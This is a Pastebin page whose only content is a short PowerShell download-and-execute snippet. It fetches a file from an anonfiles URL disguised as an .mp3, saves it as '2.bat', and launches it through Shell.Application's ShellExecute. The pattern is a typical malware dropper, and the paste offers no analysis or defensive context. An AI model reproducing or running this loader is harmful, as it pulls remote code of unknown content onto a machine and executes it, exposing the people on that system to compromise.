Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $url_file = 'https://cdn-122.anonfiles.com/R3L9m1C8p0/9a395baa-1611475417/2.mp3'
- $file = '2.bat'
- PowerShell (New-Object System.net.WebClient).DownloadFile($url_file,$file),
- (New-Object -com Shell.Application).ShellExecute($file);
Add Comment
Please, Sign In to add comment